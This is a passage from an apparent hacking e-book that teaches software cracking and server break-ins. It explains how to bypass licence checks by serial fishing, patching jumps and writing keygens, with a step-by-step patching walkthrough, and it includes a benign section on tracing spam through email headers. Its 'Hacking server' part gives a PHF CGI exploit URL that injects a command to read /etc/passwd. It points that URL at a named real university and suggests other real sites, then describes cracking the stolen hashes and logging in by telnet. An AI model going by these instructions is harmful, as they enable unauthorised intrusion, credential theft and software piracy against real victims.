Mail:mtahirzahid@yahoo.com

Page 276


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 277


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 278


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 279


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 280


Power Of Hacking速

RF HACKING:_

Mail:mtahirzahid@yahoo.com

Page 281


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 282


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 283


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 284


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 285


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 286


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 287


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 288


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 289


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 290


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 291


Power Of Hacking速

Software Security and Reverse Engineering What is reverse engineering? Today the market of software is covered by an incredible number of protected applications, which don't allow you to use all features of programs if you aren't a registered user of these. Reverse engineering is simply the art of removing

Mail:mtahirzahid@yahoo.com

Page 292


Power Of Hacking® protection from programs also known as “cracking”. In Some other words cracking is described as follows: - “When you create a program you engineer it, in fact you build the executable from the source-code. The reverse engineering is simply the art of generate a source-code from an executable. Reverse engineering is used to understand how a program does an action, to bypass protection etc. Usually it's not necessary to disassemble all code of the application not only the part of the application that we are interested must be reversed. Reverse engineering used by a cracker to understand the protection scheme and to break it, so it's a very important thing in the whole world of the crack.” In short: - "Reverse Engineering referred to a way to modify a program such that it behaves as the way a reverse engineer wish." “Cracking is a method of making a software program function other than it was Originally intended by means of investigating the code, and, if necessary, patching It.” A Little bit of history Reveres egg. Most probably start with the DOS based computer games. The aim is that a player has full life and armed in the final stage of the game. So what a reverse egg. Do is just find the memory location where the life and number of weapons are store and then modify this values. They used memory-cheating tools such as game hack etc. So that they have full life and armed in the last stage of the program. But in today’s world with the advent of the shareware concept more and more software author releases the shareware versions. Hence with this reverse engineering become more tedious, more complex, and trickier. Today to protect the software a programmer use various kind of technique, some of them are old, bad repetitive techniques but some are new. We will discuss them in next section. Various Protection schemas

Mail:mtahirzahid@yahoo.com

Page 293


Power Of HackingŽ Following are the most commonly used schemas 1) Hard coded serial 2) Serial number, name protection 3) Nag screen 4) Time trial 5) Dongle (hardware protection) 6) Commercial protection 7) Other (cd rom check, keyfiles, disabled function etc.) Let’s study this in detail 1) Hard coded serial: -This is the simple protection as compared to other. In this kind of protection we have to enter only a serial number and this serial number is same for all users. Serial numbers entered are compared to the original serial through an algorithm and if a user entered correct serial then the software registered. 2) Serial number - name protection:-In this kind of protection we have to enter a name and a serial number. Then our serial no is compared with the original serial, no which is derived from our name using some algorithm. This protection is some time easy and some times hard, based on the algorithm a programmer use. Example of this type protection is most widely used software "WinZip." 3) Nag screen :-In this kind of protection a screen come each time a user start the application, to remained such that how many days are left or your software are unregistered or any other message. This is a littlie hard to remove. And most of the newcomers found it difficult as a new programmer to understand pointers (i.e. –WinZip). But if a reverse has enough knowledge of windows API then he can easily remove the nag screen. 4) Time Trial: - According to +ORC This kind of protection has any of following protection or combination of following protection schema: Mail:mtahirzahid@yahoo.com

Page 294


Power Of Hacking® a) To a predetermined amount of days, say 30 days, starting with the first day of installation. This is referred as "CINDERELLA protection". b) To a predetermined period of time (ending at a specific fixed date) independently from the start date... 'BEST_BEFORE a given date' protection. c) To a predetermined amount of minutes and/or seconds each time you fire them... 'COUNTDOWN' TIME PROTECTIONS' example of this kind of programs are some games and audio video player which allows an unregistered user to play game for some amount of time say 5 minutes etc. d) To a predetermined amount of 'times' you use them, say 30 times. Strictly speaking these protections are not 'time' dependent. But they depend only on thing "HOW MANY TIMES YOU EXICUTE THEM" 5) Dongle Protection: - this kind of protection is supposed to be toughest protection to crack. This protection is consisting of an EPROM, which was connected with a port on computer. The program which is protected by this is first cheeks the presence of this and then cheeks that the program is registered or not all though it implementation is too hard and hence this kind of protection is not very widely used. This is used in Big Protected shareware’s. This protection is used by a I/O LPT port (hardware) You will need the registration Card attached To your PC's parallel port Or other in order to make The program fully work, otherwise it will be Expired after xxDays / xxUses /rippled or it won’t work at all. Dongles such as: HASP / Sentinel are most commonly used. Dongles uses DLLs/VxD to check the "is registered" Dongle API is also used for some checks. Example of programs, which uses this kind of protection, included some version of CAD etc. 6) Commercial protection: - Most of the software programmer don’t want to spend there precious time in deciding which kind of protection they used to protect there Mail:mtahirzahid@yahoo.com

Page 295


Power Of Hacking® software. Because they think that instead of the spending there time on designing the security algorithm of there programs, why not they spend time to improving the functionality of there program??? And here comes the concept of commercial protection. Today some software company’s designs only security algorithm for various software. Also they provide general software, which converts fully functional software in to unregistered version and after paying the registration. This software gets converted back in to the fully functional registered software after entering the registration details. some of the companies which uses commercial protection for there software are macromedia, Symantec etc and some companies which provides this type of protection are preview systems (vbox protection) etc.. Although this kind of protection has high security because they are professionally designed but they also have some disadvantages. One major disadvantage is that "if a person cracks only one program which is protected using this protection, then he has cracked the entire program which uses this kind of protection!!!!". For example if a cracker has cracked the flash mx (which is protected by vbox) then he was able to crack easily all the macromedia software such as dream waver mx etc., because all these programs are based on only one kind of protection! And in the real world there is no protection, which is still uncracked. 7) Other protections: - There are many other techniques which are used to protect software. These are generally used in computer games. Such as cd rom protection, disabled function etc. I think most of computer user are familiar with this protection and already seen this kind of protection. For example: - If a user doesn’t have cd for a particular game then he cannot be able to play the game directly from hard disk. Because when one runs the program then the program checks for the cdrom. Also some protection schemes have disabled functions such as you cannot save your work or you cannot use any particular function etc. Mail:mtahirzahid@yahoo.com

Page 296


Power Of HackingŽ So I hope now you understand all the protection schemas, which used to protect software. Ok let’s study how reverse engineering is done. The first thing to keep in mind that cracker always works with the disassembly and they are familiar with the windows API. Now all of us computer user knows that computer only understands binary nothing else. So first we create a program and then compile it now what compiler does is check for syntax, any error and then he generate the .obj file. As in high level language some function are prewritten which are stored in library file hence after this we used linker which links the programs with the library file and then after linking we get an exe file hence exe file we use is nothing but the collection of instruction in binary formats. Now to reverse engineer there are different tools available. TOOLS OF THE TRADE The popularity of Windows and the ease of creating programs for this platform have lead to the development of thousands of shareware programs. Crackers usually work with the assembly code, reverse engineering it, and have an excellent grasp of the Windows APIs as well. There is no one particular method to crack a program. Depending upon the program and the kind of protection it has, crackers employ different techniques to get into the program. But there are some common tools that crackers employ to start cracking the program. These programs are perfectly legal and useful by themselves. They are: 1) Debugger 2) Dissembler 3) Hex-editor 4) Unpacker 5) File Analyzers Mail:mtahirzahid@yahoo.com

Page 297


Power Of Hacking速 6) Registry monitor 7) File monitor This is the tools, which a cracker used to reverse engineer any software. Let we have take a detail look on them. 1) Debugger: -all of us know that debugger is a utility to debug the program. A programmer use debugger to find bugs in their program. Debugger is only tool by which we can trace/break a function or code live. There are many debuggers available in the market. We all know how to debug any program, first we put a breakpoint on the required statement and then we run the program. When this instruction is near to be executed the program stops and we can see values! This thing is directly related with cracking. Generally software programmer uses windows API function to get the serial number or to create nag screen or dialog boxes. Now if a debugger support breakpoint on execution of ape then a cracker easily set a breakpoint on API such as "getwindowtexta" and then after tracing only some lines of code he can easily find the algorithm to used the generate key and the key itself!!! There are many debuggers available in the market but one of the most popular and a powerful debugger is SOFTICE from NUMEGA CORPORATION. This debugger is so powerful that earlier version of this debugger used to crack himself!!!! Almost all the cracker in this world is using this debugger. So after seeing its misuse Numega Corporation has kept some restriction on the sale of this great debugger and a buyer must show that he will not use this debugger for illegal activities. But cracked copy of this debugger is freely available on the net. This is a system level debugger, which works directly between a computer's hardware and windows. We cannot load this debugger within windows. We must load this debugger before windows loads in to the memory. It can monitor every process, threads silently in memory until we call it up using hotkeys.

Mail:mtahirzahid@yahoo.com

Page 298


Power Of HackingŽ It allow us to patch memory at runtime (not permanently and hence we have to use hex editor.) viewing the contents of the register, contains at memory address etc. 2) Disassembler: - As an executable file is in binary format so a normal user cannot understand the instruction in this file. Also any exe or executable is generally in PE format (which is a standard format for exe file, decided by the committee of software companies like MICROSOFT, IBM, and AT&T. For more about exe search any virus related site or /simply search your favorite search engines.) Hence a cracker first disassemble the program .now a Disassembler converts the binary file in its equitant assembly language instruction’s most of program is written in high level language hence size of the disassembly goes in millions (or even larger) of lines and hence it is not possible for any cracker to understand this code. And hence cracker generally looking for strings in this disassembly such as; -"your 30 day trial period has expired." Or "the serial no you entered is not valid!!!" Etc. Then they trace the assembly code some lines and simply reverse the jumps. (For example one to jump) so that control did not come on this string and go to the statement such as "thanks for registration!!!"(We will see later how this can be done but currently this info is enough for you..) Now there are many dissembler available. But two of them, which are most commonly used, are WIN32DASM and IDA .IDA is a powerful debugger then WIN32DASM and used for advanced cracking. But WIN32DASM is most widely used debugger by newcomer and intermediate crackers. This debugger allows you to disassemble any file which is in PE format, we can save disassembly .it can tell us which function is imported, which function is exported, we can execute jump, call, find string data reference and dialog reference easily and many more facilities it provides like we can executes the exe

Mail:mtahirzahid@yahoo.com

Page 299


Power Of HackingÂŽ file, step in to it, step over and blah, blah.

3) Hex Editor: -as I mention above that softice can change the value at memory location only at the run time. Now this is not useful or not a good cracking if we have to change the value each time we run the program. Therefore we use hex editors. A hex editor allows us to change the contents of any file in hex format. It displays the contents of the file in hex format. We can simply have to change the value at memory location which we find using softice. Now there are a lot of hex editor available such as ultredit, biew, hiew and a lot (I think many c, c++ programmers has developed it). But the most popular among these is HIEW. Which stands for “Hacker's vIEW". This little program offers a lot of facilities such as editing in hex or ASCII format, searching any string in hex or ASCII format. There is another good facility which makes it different from others is that, it offers you to write the assembly code and it can automatically convert this code in to equitant hex format. This is helpful for the crackers who don’t know equitant hex value of assembly instruction. (For example: - if we have to change the jump to nope at any memory location then after pressing F7 key then we can only write nope and it will automatically convert it to its hexequilant which is 90.) There are other hex editors also but it is the most widely used.

Mail:mtahirzahid@yahoo.com

Page 300


Power Of HackingŽ 4) Unpacker/PE Editor: - sometimes programmers used file compressor such as UPX, ASPACK to minimize the size of the program. This is called a file packer. Now what a packer do is using any algorithm he reduce he size of the file and append it code in to the exe file and at run time, first the code of the unpacker is executed and after that it decompress or unpack the program in memory. Since the program we have to crack is unpacked in the memory only hence a cracker cannot simply disassembles and patch the program. User can only patch it runtime. Therefore to un-pack the exe file permanently we use unpacked. Which unpack the exe file and we can store this unpack file to the disk. If a program is using a packer then its exe header will changed. There are various techniques available to manually unpack the exe by modifying the exe header but those are high level techniques and don’t want to discuss them here because I think most of the newsiest find difficult to understand it. The most widely used unpacker is procdump. This software has ability to unpack different kind of packer stand-alone. It also allows changing or viewing the header of exe files.

5) File Analyzers: - To identify which packer is used to pack file cracker uses this kind of programs. By using this, a cracker can know which compiler or packer is used to protect the shareware. This software simply works on signature byte. With the help of

Mail:mtahirzahid@yahoo.com

Page 301


Power Of HackingÂŽ this you can find what compiler or in which language the program has written. There are many this kind of program are available such as file inspector, File Info etc.

6) Registry monitor: -Some program uses registry keys to store their registration information. Hence, ‘Registry Monitor’ is a software which works in background and traps all the registry access by the all process, which is currently running.

7) File monitor: -some program also uses key file or they have there security algorithm Mail:mtahirzahid@yahoo.com

Page 302


Power Of Hacking速 in different file and hence file monitor is use to see which application is using what file. Bypassing the protection How programs are Reverse engineered

In my pervious article I discussed about the different protection schema and tools used for cracking. In this article I show u how cracker past all these protections. There are different ways to crack. These approaches are determinate from different knowledge, different type of cracker, different personal preferences. An example can be more useful than thousand of words. There are three type of approaches in cracking shareware programs that need serial number to register or have nag screens. They are 1) Serial fishing 2) Bypassing of the check also called patching 3) To make a key generator . The first method is simplest and fastest and can be used by normal cracker. The last one is more complex. In fact, you need to understand all the serial number check routine and then u have to code a program based on this which generates the key according to input. The advantage of this method is that the serial number can be used for further versions of

Mail:mtahirzahid@yahoo.com

Page 303


Power Of Hacking® the program or for different computers or for different user. So, the choice is determined from the level of knowledge, the time the cracker has and his style of cracking. Let’s have a detail look on them. 1) Serial fishing : -serial fishing is supposed to be the cleanest method to crack any program. This method is also known as live cracking because in this we find the correct serial only at run time. It means we find the serial when program is executing. Serial fishing deals with finding the correct serial and then registering software using this serial number. In serial fishing we don’t have to modify the code but simply we have to inspect or analyze the code. In serial fishing first we enter any fake i.e. wrong serial number of our choice say 123456 .now this serial number is compared with the correct serial and hence we have to only find the memory location or register where our correct serial number is stored. The general routine in high-level language to compare the serial number is as follows: If (entered serial=correct serial) then Register program (do some modification in program or store the registration information) Message box (“successfully registered”) Else Message box (“sorry!! Your serial number is not valid”) And in assembly the general routine is as follows: In assembly all the data is stored in registers or stored in any memory location. Suppose eax register store the fake serial and ebx stores the correct serial. Now the routine is: 100aa : Cmp eax,ebx 100bb : Jz 100xx ?jump if our serial is correct 100cc : Mov ax,yyyy 100dd: other code…. Mail:mtahirzahid@yahoo.com

Page 304


Power Of Hacking® 100xx : code for message box successfully registered 100yy : code… Where 100xx is memory locations. Here what is happening that both serial numbers is compared using the cmp instruction and if the two serials are equal then control jumps to the message that we have entered the correct serial. Otherwise controls transfer to next statement, which is 100% sure like this “you have entered a invalid serial” Although this is not necessary that always cmp is used. But mostly it is used to compare the serial. Now the programmer uses windows APIs such as GetWindowTextA or GetDlgItemTextA to get the serial numbers. Now as I mentioned SOFTICE allows us to set or put a breakpoint on windows API. Hence a cracker simply puts the breakpoint on such API and when after entering the serial number program breaks on this breakpoint then a cracker simply trace the disassembled code to find the correct serial. Crackers while tracing is simply search the conditional jump such as jne or jz or jae after a cmp instruction. In short they checks the routine I mentioned above and in this way a cracker can find the whole algorithm and correct key with the simple softice command such as: D eax Or ? eax Well here D eax simply display contains of the register eax in hex format. And? eax display contains of eax in ASCII format. (All these are softice commands). And after finding correct key he can easily register the software and if he want to distribute the key for every user then he simply creates a keygenrator after analyzing the whole algorithm. Because we know that in serial number-name protection for each name there will be a different key. Some program also uses various techniques such as Mail:mtahirzahid@yahoo.com

Page 305


Power Of Hacking® appending ur hard drive serial number to the end of serial and etc in this case serial number is different for each computer and hence a cracker simply writes the key generator after analyzing the whole protection schema. By using this technique a cracker can easily defeat the first two protections I mentioned in my previous article (hard coded and name-serial number combination.) 2) Patching : - if a program is showing the nag screen and don’t have any option to register then we use patching. Patching is also referred as dead cracking. Using patching is not supposed to be a good crack. most crackers avoid to use this technique until they don’t have other option then this. In case of nag screen programmer simply uses the windows API such as DialogBoxParam or MessageBoxa etc. now a cracker sets the breakpoint on these API calls and run the program. Now when the program calls this function then softice pauses the execution of program and a cracker have to deal with the assembly snippets. The simple structure of calling a nag screen in high-level language is as bellow: If (program is not registered) then Display the nag screen Else Execute the program And in assembly the structure is as follows: Suppose that first program checks for the registration and return the value in eax register. (If eax=1 then register and eax=0 mean unregistered) Now this compared as dddd: Cmp eax,1 aaaa: Jz xxxx bbbb: Mov ax,02 cccc: Call yyyy ?this is for calling the nag screen Mail:mtahirzahid@yahoo.com

Page 306


Power Of Hacking® Xxxx: Rest of the program… Here aaaa ,bbbb etc are called offset or memory locations. So whats happening here is that first program checks that if it is registered .the registration status of program is put in to eax. Now this eax is compared with 1 if eax is one then program is registered and we don’t have to show the nag screen else we have to show the nag screen. So we have to only reverse the jump (jz to jnz). So that the nag screen does not appear. In this case we use hex editor such as hiew to patch the exe file of programs. Patching is also used to remove the time trial protections. Suppose we have a program, which expires after 30 executions. Now it is clear that when we run the program it compares that is 30 executions are over or not. If not then it increases the number of total execution by 1 and store this value somewhere but if 30 executions are over then it shows the message that ur program has expired. The structure is same as the nag screen: aaaa : cmp eax,1e ? (1E in hex=30 in decimal) bbbb : jea xxxx ?jump if greater then or equal to 30 cccc : ax,02 dddd: call yyyy ?this is for calling the nag screen eeee: ret ?stop execution and exit Xxxx: Rest of the program… Here what’s the program is doing is that it comparing the number of times we use with 30 if it is equal or above then it display the message and exit. so what we do here is simply change the jea to jmp. so that program always jump irrespective of that if it is registered or not. 3)Key generator:-this technique is supposed a little harder. in this technique a cracker need to understand all the serial number check routine and understand all the conditions. Mail:mtahirzahid@yahoo.com

Page 307


Power Of Hacking® such as a serial number can contain ‘–‘ symbol or size of serial number must be 11 character long or user name must not be blank etc. this techniques simply needs that a cracker must understand the assembly language very well and analyzes the code very carefully. he must be careful to analyze each line of code. because a small mistake in understanding the code can result in unexpected results. Now lets see how crackers past the commercial protection. Well today many of the commercial protection are using different techniques to fool the tools of cracking such as anti dissembler code. Anti softice tricks and etc. hence this protections are harder to crack for a newcomer. First lets see how this program protects the software: There are common dll or say binary file for all the software which uses a particular commercial protection such as the entire macromedia product uses the same protection ‘vbox’ and all the files related with vbox is stored in the c:\programfiles\comman\vbox directory. Now when a user runs the program then first the vbox files are executed. Which check that if program is registered or not. If program is not registered then it checks the 30 days trial period and if trial not expired then executes the program. Commercial protection included many checks so a cracker cannot easily patch the program. The most popular trend in between the cracker is that they simply BYPASS this kind of protection. it means as I mentioned that the vbox changed the header of exe file and for this reason all files related with vbox is executed before the actual exe file of program is executed. Now what a cracker does is simply find the original entry point of the exe. It means a cracker only have to find that from which point the original program starts its execution. For this a cracker puts breakpoint on windows API such as GetProcAddress etc and then run the program. Now when program executed then first vbox code is executed and therefore vbox calls the API GetProcAddress and SOFTICE pauses the execution of program. Now a cracker have the assembly snippets. The rest is Mail:mtahirzahid@yahoo.com

Page 308


Power Of Hacking® purely depends on a crackers ability and experience. After tracing some lines from the vbox files a cracker can find the original program entry point. After finding the entry point a cracker simply modify the exe header and IAT. So now onwards program has nothing to deal with commercial protection because cracker has bypassed the protection!!!! For each commercial protection there is a different way to crack. The method I discussed here is only related with vbox protection. So this are all the techniques generally used in cracking world. Nowadays there are several cracking groups specialized in reverse web scripts. There is nothing of new in this because the web pages are written in java or CGI scripts or something else. So, they can be considered as small programs. Consequently, this is only another type of crack. The web cracker usually reverses the protection schemes of web pages creating cracked passwords, which are distributed on the web. To end this article I would like to mention these lines of a cracker:“There is a crack, a crack in every thing. That is how the light gets in.” Hope it tells the psychology of a cracker. Important read:This upload contains the following hacking and cracking softwares:

1.Clonyxxl

2.HIEW

3.OLLYDBG

Mail:mtahirzahid@yahoo.com

Page 309


Power Of Hacking速 4.PEID

5.Runasdate

6.SoftIce

7.W32SASM

1.Clonyxxl - ClonyXXL is a copyprotection detection scanner, wich can show what kind of protection is used on a disc.

2.HIEW -Hiew (short for Hacker's view) is a popular console hex editor for DOS and Windows written by Eugene Suslikov (sen).The program is particularly useful for editing executable files such as COFF,PE or ELF executable files.

3.OLLYDBG -OllyDbg is a debugger that emphasizes binary code analysis, which is useful when source code is not available.

4.PEID -PEiD detects most common packers, cryptors and compilers for PE files. It can currently detect more than 600 different signatures in PE files.

5.Runasdate -RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn't change the current system date and time of your computer, but it only injects the date/time that you specify into the desired application.

6.SoftIce -SoftICE is a kernel mode debugger for Microsoft Windows. Crucially, it is designed to run underneath Windows such that the operating system is unaware of its Mail:mtahirzahid@yahoo.com

Page 310


Power Of Hacking速 presence. Unlike an application debugger, SoftICE is capable of suspending all operations in Windows when instructed.

7.W32SASM -W32DASM is the perfect utility to learn how Windows programs operate.Disassembles Both 16 and 32 Bit Windows Programs. Displays for Exports, Imports, Menu, Dialog, and Text References. How to crack a program, example of exe file say KeygenMe for demonstration how to crack progam exe file 1) place KeygenMe.exe, HIEW32.exe from Hiew folder and put folder W32Dasm 8 on desktop and then click on keygenMe.exe and enter any value it will give error as "Try again" or "invalid key"

2) then click on W32DSM89.exe in folder W32Dasm 8 and from dissambler select option 'open file to disassembler' and select the KeygenMe exe file and it will disassemble the code.

3) After that click on search option and in that click on 'find text' and in find type your message say for in this instance "Try again" and click find next and it will find the exact string.

4) when u find the string message and press cursor up button and u will find the specific conditinional or unconditional referenced call address and find the address for this message and in this case the address is 0046723E(C).

5) After that in desktop make another copy of KeygenMe.exe by copy paste and then move or drag KeyGenMe - Copy.exe to HIEW32.exe and finally it opens in blue screen HIEW hex editor.

6) when the blue screen HIEW hex editor opens and then click function key F4 and select decode.

Mail:mtahirzahid@yahoo.com

Page 311


Power Of Hacking速 7 )Now press F5 and then ignore 0's of address 0046723E and write .46723E and press enter.

8) After that press F3 and in edit mode at 0666339 set values as 0066639 =90 006663A = 90 ............... .............. ........... till upto 40 that is upto 006663f = 90

9) after that save it

10) update and select truncate no

11) finally press F9 and F10 and done

12) now close it and open the KeyGenMe - Copy.exe and enter any value and you get the message " you crack me " and with this you have cracked the keygen.exe file Backtracking EMAIL Messages

Tracking email back to its source cause i hate spammers... Evil or Very Mad

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In Mail:mtahirzahid@yahoo.com

Page 312


Power Of Hacking速 short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.

Return-Path: <s359dyxtt@yahoo.com>

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108]) by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7 for <davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Mail:mtahirzahid@yahoo.com

Page 313


Power Of Hacking速 Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID: <n5-l067n7z$46-z$-n@eo2.32574>

From: "Tahir" <s359dyxtt@yahoo.com>

Reply-To: "Tahir" <s359dyxtt@yahoo.com>

To: ukhacker@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

Mail:mtahirzahid@yahoo.com

Page 314


Power Of Hacking速 According to the From header this message is from Tahir at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn't come from yahoo's email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.

Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1) 12.0.0.0 - 12.255.255.255 Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12218-168-0-1) 12.218.168.0 - 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15 Mail:mtahirzahid@yahoo.com

Page 315


Power Of Hacking速 # Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

Mail:mtahirzahid@yahoo.com

Page 316


Power Of Hacking速 But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars. Hacking server:I am asked at least 5 or more times a day by young, beginning "hackers", "How can I hack?" or "Is there a way to hack a web site?" Well there is. There are, in fact, literally hundreds of ways to do this. I will discuss a few in this text to get you started. Every hacker has to start somehow and hacking web servers and ftp servers is one of the easiest ways. If you are reading this I am assuming that you already have a basic knowledge of how web servers work and how to use some form of UNIX. But I am going to explain that stuff anyway for those of you who don't know.

Part 1: Simple UNIX Commands

Most DOS commands have UNIX and Linux equivalents. Listed below are some of the main commands you will need to know to use a shell account.

HELP = HELP COPY = CP MOVE = MV DIR = LS DEL = RM Mail:mtahirzahid@yahoo.com

Page 317


Power Of Hacking速 CD = CD

To see who else is on the system you can type WHO. To get information about a specific user on the system type FINGER <username>. Using those basic UNIX commands you can learn all you need to know about the system you are using.

Part 2: Cracking Passwords

On UNIX systems the file that contains the passwords for all the users on the system is located in the /etc directory. The filename is passwd. I bet your thinking...."Great. All I have to do is get the file called /etc/passwd and I'll be a hacker." If that is what you are thinking then you are dead wrong. All the accounts in the passwd file have encrypted passwords. These passwords are one-way encrypted which means that there is no way to decrypt them. However, there are programs that can be used to obtain passwords from the file. The name of the program that I have found to be the best password cracker is called "Cracker Jack." This program uses a dictionary file composed of thousands of words. It compares the encrypted forms of the words in the list to the encrypted passwords in the passwd file and it notifies you when it finds a match. Cracker Jack can be found at my web site which is at http://www.geocities.com/SiliconValley/9185 Some wordlists can be found at the following ftp site: sable.ox.ac.uk/ pub/wordlists. To get to the wordlist that I usually use goto that ftp site then goto the American directory. Once you are there download the file called dic-0294.tar.Z which is about 4 MB. To use that file it must be uncompressed Mail:mtahirzahid@yahoo.com

Page 318


Power Of Hacking速 using a program like Gzip for DOS or Winzip for Windows. After uncompressing the file it should be a text file around 8 MB and it is best to put it in the same directory as your cracking program. To find out how to use Cracker Jack just read the documentation that is included with it.

Part 3: The Hard Part (Finding Password Files)

Up till now I have been telling you the easy parts of hacking a server. Now we get to the more difficult part. It's common sense. If the system administrator has a file that has passwords for everyone on his or her system they are not going to just give it to you. You have to have a way to retrieve the /etc/passwd file without logging into the system. There are 2 simple ways that this can sometimes be accomplished. Often the /etc directory is not blocked from FTP. To get the passwd file this way try using an FTP client to access the site anonymously then check the /etc directory to see if access to the passwd file is restricted. If it is not restricted then download the file and run Cracker Jack on it. If it is restricted then try plan B. On some systems there is a file called PHF in the /cgi-bin directory. If there is then you are in luck. PHF allows users to gain remote access to files (including the /etc/passwd file) over the world wide web. To try this method goto your web browser and type in this URL: http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Then substitute the site you are trying to hack for the xxx.xxx.xxx. For example, if I wanted to hack St. Louis University (and I have already) I would type in http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Mail:mtahirzahid@yahoo.com

Page 319


Power Of Hacking速

Don't bother trying www.slu.edu because I have already done it and told them about their security flaw. Here's a hint: try www.spawn.com and www.garply.com

If the preceding to methods fail then try any way you can think of to get that file. If you do get the file and all the items in the second field are X or ! or * then the password file is shadowed. Shadowing is just a method of adding extra security to prevent hackers and other unwanted people from using the password file. Unfortunately there is no way to "unshadow" a password file but sometimes there are backup password files that aren't shadowed. Try looking for files such as /etc/shadow and other stuff like that.

Part 4: Logging In To "Your" New Shell

OK....This is where you use what you found using Cracker Jack. Usernames and passwords. Run your telnet client and telent to the server that you cracked the passwords for, such as www.slu.edu. When you are connected it will give a login screen that asks for a login names and password and usually information on the operating system that the server is using (usually UNIX, linux, aix, irix, ultrix, bsd, or sometimes even DOS or Vax / Vms). Just type in the information you got after cracking the passwd file and whatever you know about UNIX to do whatever you feel like doing. But remember that hacking isn't spreading viruses or causing damage to other computer systems. It is using your knowledge to increase your knowledge.

Mail:mtahirzahid@yahoo.com

Page 320


Power Of Hacking速 Part 5: Newbie Info

If you feel that you have what it takes to be a serious hacker then you must first know a clear definition of hacking and how to be an ethical hacker. Become familiar with unix environments and if you are only just starting to learn to hack, visit a local library and find some books on various operating systems on the internet and how they work. Or you could go to a book store and buy a couple internet security books. They often explain how hackers penetrate systems and that is something a beginner could use as an advantage. Hacking Webpage - The Ultimate guide

Well Psychotic wrote one of the most helpful unix text files in cyberspace but with the mail that we recieved after the release of our famous 36 page Unix Bible we realised that unix isn't for everybody so we decided that we should write on another aspect of hacking..... Virtual Circuit and Psychotic is proud to release, "Hacking Webpages With a few Other Techniques." We will discuss a few various ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects.

Getting the Password File Through FTP

Mail:mtahirzahid@yahoo.com

Page 321


Power Of Hacking速 Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file...

